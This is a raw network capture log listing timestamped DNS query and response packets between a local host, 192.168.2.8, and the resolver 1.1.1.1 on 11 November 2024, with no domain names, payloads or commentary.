                                                                                                                                                                                                          Nov 11, 2024 18:24:39.519751072 CET5475753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.519906044 CET5798553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.520101070 CET5790553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.520268917 CET53495011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.520404100 CET53617201.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.520673037 CET53644081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.520930052 CET53608151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.521135092 CET53628031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.522232056 CET53625901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.525320053 CET5485753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.526227951 CET53512951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.526338100 CET53614071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.526391029 CET53622771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.526932955 CET53560811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.527012110 CET53602931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.527566910 CET53532721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.527578115 CET53550051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.528474092 CET53594851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.528485060 CET53539491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.528640985 CET53623291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.528652906 CET53559951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.528850079 CET53545171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.529115915 CET53621001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.529126883 CET53613601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.529314041 CET53496591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.529588938 CET53547571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.529964924 CET5142453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.530407906 CET53615341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.530746937 CET53532161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.531419039 CET53579051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.534611940 CET53556331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.535896063 CET53548571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.536258936 CET6416853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.536444902 CET5007253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.536912918 CET5525853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.537473917 CET5748053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.538980961 CET5857253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.539210081 CET5929253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.540220976 CET5043653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.540293932 CET53493161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.800708055 CET53536081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.807106972 CET53557131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.808372021 CET53493941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.811973095 CET53547901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.812159061 CET53647721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.846240044 CET5946253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.857770920 CET53594621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.185837984 CET6268153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.195139885 CET5104853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.202914000 CET53510481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.204226017 CET5303353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.206624031 CET5103753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.207931995 CET5917053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.207983971 CET5071753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.209291935 CET5303753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.213891029 CET53530331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.215780973 CET5624453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.216842890 CET5877553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.216875076 CET4967953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.217158079 CET53510371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.217446089 CET5301153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.217550993 CET53626811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.217634916 CET5537953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.218043089 CET53591701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.218293905 CET5443053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.218771935 CET5282653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.219269037 CET6148353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.219660997 CET5441153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.219882965 CET53530371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.224827051 CET53562441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.227178097 CET53553791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.227194071 CET53544301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.227437019 CET53496791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.227561951 CET53530111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.229023933 CET53528261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.230289936 CET53614831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.230731964 CET53544111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.239589930 CET53507171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.248470068 CET53587751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.254836082 CET5554553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.264406919 CET53555451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.273113012 CET5014953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.283725023 CET53501491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.307696104 CET5275953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.318394899 CET53527591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.359226942 CET5608553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.369460106 CET53560851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.424685001 CET5213353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.424966097 CET6277053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.437206984 CET53521331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.455617905 CET53627701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.526896954 CET5522553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.545222998 CET53552251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.584842920 CET6415853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.585203886 CET5029153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.585715055 CET5574153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.586237907 CET4944653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.594997883 CET53641581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.595319033 CET53557411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.596128941 CET5132053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.603774071 CET53502911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.608129025 CET53513201.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.609500885 CET5122153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.609738111 CET5066153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.610291004 CET5183853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.610697985 CET5393153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.614480019 CET5895353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615370035 CET4940453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615580082 CET6252153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615905046 CET5997353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615931034 CET6456153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.616811991 CET53494461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618273973 CET6458353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618457079 CET5537453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618906975 CET6116453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.619856119 CET5949353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.619908094 CET6466053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.620347023 CET53506611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.621014118 CET53539311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.622823954 CET6383153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.624831915 CET53494041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.627496958 CET53625211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.627511024 CET53645611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.629715919 CET53646601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.629890919 CET53645831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.630012989 CET53594931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.633435965 CET53638311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.633480072 CET5656753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634042978 CET5609353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634229898 CET5077253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634382963 CET4975353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.635385990 CET6178053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.635750055 CET5466553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.636029005 CET5679853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.637082100 CET53553741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.638153076 CET5813453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.639739990 CET5915953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.640899897 CET53512211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.641475916 CET53518381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.641870975 CET53611641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.643856049 CET53497531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.645298004 CET53589531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.645343065 CET53546651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.646018982 CET53507721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.646032095 CET53617801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.646502018 CET53567981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.390042067 CET53596851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.391680956 CET53621031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.392571926 CET53580091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.393285036 CET53646421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.393987894 CET53572851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.396410942 CET53587491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.400191069 CET6470853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.400224924 CET53641111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.400361061 CET5412353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.401598930 CET5098953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.408062935 CET53625251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.408691883 CET53637281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.409491062 CET53588671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.411817074 CET53509891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.413980961 CET53621631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.431396961 CET53541231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.434123039 CET53647081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.535883904 CET5228753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.546895027 CET53522871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.584309101 CET5046853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.585575104 CET6040253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.592622995 CET5930153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.594341993 CET53504681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.596405029 CET6254853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.604022026 CET53593011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.607515097 CET53625481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.616463900 CET6234453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.618804932 CET53604021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.634567976 CET6370753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.642777920 CET5272353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.647037983 CET53623441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.648323059 CET5941253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.652713060 CET53637071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.653552055 CET53527231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.657454967 CET5054453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.657757044 CET53594121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.658436060 CET6145853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.668212891 CET53505441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.669138908 CET53614581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.712241888 CET6398253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.716012955 CET5836453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.721611977 CET53639821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.735788107 CET6536253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.746380091 CET53653621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.747705936 CET53583641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.774337053 CET5483653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.776078939 CET5525353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.778621912 CET5190053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.785068035 CET53548361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.786974907 CET53552531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.810524940 CET53519001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823117018 CET5826953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823302031 CET6124453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823525906 CET5852453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823684931 CET5677853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.832861900 CET53585241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.833120108 CET53582691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.838537931 CET5810753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.849483013 CET6042953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.850912094 CET5176053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.851237059 CET5426953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.852354050 CET6129653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.852752924 CET6510053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.853514910 CET5967653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854079962 CET5277453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854298115 CET6518453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854548931 CET6278953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854732990 CET5455353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.854882956 CET5781053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855030060 CET6061753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855202913 CET6231053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855319023 CET53612441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855483055 CET53567781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.855571985 CET5330453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.856885910 CET6260053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.859375954 CET53604291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.861169100 CET53517601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.861226082 CET53542691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.863531113 CET53651001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.864789009 CET53545531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.864881039 CET53623101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.864893913 CET53527741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.865708113 CET53612961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.865720034 CET53596761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.865731955 CET53606171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.866131067 CET53533041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.867688894 CET53626001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.870975971 CET53581071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.879204035 CET53651841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.885035038 CET53627891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.886975050 CET53578101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.898762941 CET5738453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.898947001 CET5983353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.903695107 CET5153453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.903711081 CET5884153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.904151917 CET5899453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.906656027 CET53573841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.907557964 CET6321353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.908613920 CET5370853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909025908 CET6280553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909292936 CET6220653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.909851074 CET5247253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.910300016 CET6033753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.910630941 CET5694653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.911268950 CET5966153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.911839962 CET5810953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619632006 CET5750653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619806051 CET4921653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619877100 CET6220253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619992971 CET6441253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.620373011 CET5193853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.620579004 CET6478353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.621052980 CET5059953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.621243954 CET5010253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625456095 CET6361953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625629902 CET4953853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625792027 CET5355253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625943899 CET5347053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626089096 CET5579253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626228094 CET5263953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626358986 CET5164653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626620054 CET5100053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627151012 CET5217253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627552032 CET53519381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627934933 CET5535053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.628942013 CET53576181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.628950119 CET53575061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.628956079 CET53637041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630449057 CET53622021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630641937 CET53505991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630686045 CET53644121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630692005 CET53647831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630779982 CET53629821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630930901 CET53492161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.631261110 CET53501021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.631983042 CET5722553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.635281086 CET53495381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.635478973 CET53534701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.635698080 CET53516461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.636054993 CET53535521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.636811972 CET53526391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.636817932 CET53557921.1.1.1192.168.2.8
